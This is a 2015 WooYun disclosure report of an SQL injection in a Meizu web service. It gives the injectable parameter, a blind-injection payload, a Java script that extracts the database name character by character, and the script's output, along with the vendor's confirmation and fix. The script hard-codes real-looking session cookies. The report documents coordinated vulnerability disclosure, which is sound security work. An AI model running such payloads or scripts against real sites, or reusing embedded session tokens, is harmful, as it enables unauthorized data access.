当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143692

漏洞标题:魅族某站点SQL注入漏洞

相关厂商:魅族科技

漏洞作者: 路人甲

提交时间:2015-09-27 09:42

修复时间:2015-10-09 10:59

公开时间:2015-10-09 10:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-27: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经确认,细节仅向厂商公开
2015-10-07: 细节向核心白帽子及相关领域专家公开
2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

小锤抠缝,大锤搞定
听闻魅族刚发了PRO 5手机,特来捧场(来个内部价可好)。

详细说明:

站点:http://wan.meizu.com
漏洞URL:http://wan.meizu.com/praise/users/{此处为uuid}?version=20882&page=2
列举一例:ad25a188-856d-4a55-be31-28d6ef605319
构成URL:http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2
注入点:version
payload: 20882' AND SUBSTRING(database(),2,1)='1' -- ,需要对其进行URL编码
后台存在IPS之类,写方法来验证,以下是代码段(将就着看看):

package com.test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;

/**
* @author 需求又改了
*/
public class MeizuRequest {

/**
* 发送get请求
* @param url 请求地址
* @param list 请求参数
* @return 请求结果
* @throws IOException
*/
public static String sendGet(String injectUrl) throws IOException {
StringBuffer result = new StringBuffer();
URL httpUrl = null;
URLConnection connection = null;
BufferedReader bufferedReader;
httpUrl = new URL(injectUrl);
connection = httpUrl.openConnection();
connection.setRequestProperty("Host", "wan.meizu.com");
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0");
connection.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
connection.setRequestProperty("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
connection.setRequestProperty("Accept-Encoding", "utf-8");
connection.setRequestProperty("Cookie",
"_ga=GA1.2.1012299308.1443151870; Hm_lvt_2a0c04774115b182994cfcacf4c122e9=1443152293; _uid=23733490; _keyLogin=ea5f7c9b137f2ad76d2ddcfda65d9f; _rmtk=721da5fdc3f245ce2ff2a563107292; _uticket=hBIjVSJpsYarGtdHErnitiNkuHQHhE01icUfMZ_ALKwt5wLG-6WqX_rkp9dyVE9WjQWst3qhyNNVkYYO7Mnx9-o6GLBVRf49cN4wp0r2NqlPNJ94UY2Ri-8zzYj_Kgf2RVrf0o5scF-pAdj6rmSNGzRK5822rYSqHMtfKG524Ao*ybD7tpf3TyGfVGH2XomvdQ; subnavShow=1; wan.sid=s%3Ahb0gXZI9zjzGxL5Pqtp1jFw6sfuWrKJx.7W3TsX28Ee0Qpr3H5sI%2BzSvYkcLmY99QGKhjfa%2BEKIM; Hm_lvt_1081764f96e05731190620c8597200c4=1443164252,1443241887; customer_service_language=cn; Hm_lpvt_1081764f96e05731190620c8597200c4=1443253378");
connection.setRequestProperty("Connection", "keep-alive");
connection.connect();
//接受连接返回参数
bufferedReader = new BufferedReader(new InputStreamReader(connection.getInputStream(),"utf-8"));
String line;
while ((line = bufferedReader.readLine()) != null) {
result.append(line);
}
bufferedReader.close();
return result.toString();
}

/**
* 获取用户
* @param url
* @param injectParam
* @param userLen
* @throws IOException
*/
public static void fetchUser(String url, String injectParam, int userLen) throws IOException {
String paramsStr = url.split("\\?")[1];
char[] userChars = new char[userLen];
for(int u = 0; u<userChars.length; u++) {
userChars[u]='X';
}

if (!paramsStr.equals("") && !injectParam.equals("")) {
String[] paramArr = paramsStr.split("&");
for(int i=0; i < paramArr.length; i++) {
int eqIndex = paramArr[i].indexOf("=");
String param = paramArr[i].substring(0, eqIndex).trim();
if(param.equals(injectParam.trim())) {
char[] payloads = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
'1','2','3','4','5','6','7','8','9','0','.',',','/','<','>','?',':',';','\"','\'','[',']','{','}','|','\\',
'=','+','-','_',')','(','*','&','^','%','$','#','@','!','~'};

//char[] payloads = {'1','2','3','4','5','6','7','8','9','0',':','.'};

for(int j=0; j < payloads.length; j++) {
//20882' AND SUBSTRING(database(),2,1)='1' --
String payload = URLEncoder.encode(String.valueOf(payloads[j]), "utf-8");
for(int k=0; k < userLen; k++) {
String payloadStr = "20882%27%20AND%20SUBSTRING%28database%28%29%2C" + (k+1) + "%2C1%29%3D%27"+ payload +"%27%20--%20";
String injectUrl = url.replace(paramArr[i], param + "=" + payloadStr);
String result = MeizuRequest.sendGet(injectUrl);
if(result.indexOf("username") > 0) {
userChars[k] = payloads[j];
System.out.println("database() the " + (k+1) + " place is " + payloads[j]);
} else {
if(k%userLen == 0) {
System.out.print("\n.");
} else {
System.out.print(".");
}
}
}
}
System.out.println("database() is " + String.valueOf(userChars));
}
}
}
}

/**
* main method
* @param args
*/
public static void main(String[] args) {
String url = "http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2";

//填写注入点和database()长度
try {
MeizuRequest.fetchUser(url, "version", 3);
} catch(Exception e) {
System.out.println("获取数据库名异常"+e.getMessage());
e.printStackTrace();
}
}
}


其中MeizuRequest.fetchUser(url, "version", 3);的 3 是数据库的长度,盲注可判断,如下图:

1.jpg


2.jpg

漏洞证明:

运行结果:

.database() the 2 place is a
.
...
...
...
...
...
...
...
...
...
...
...
...
..database() the 3 place is n
...
...
...
...
...
...
...
...database() the 1 place is w
..
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...database() is wan

修复方案:

求高Rank,谢谢。
结合业务做修复,你们更专业。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-27 14:14

厂商回复:

感谢白帽子反馈问题,祝中秋快乐!

最新状态:

2015-10-09:修补完成。


漏洞评价:

评论

  1. 2015-09-27 15:03 | 心云 ( 路人 | Rank:12 漏洞数:11 | 遇见)

    内部价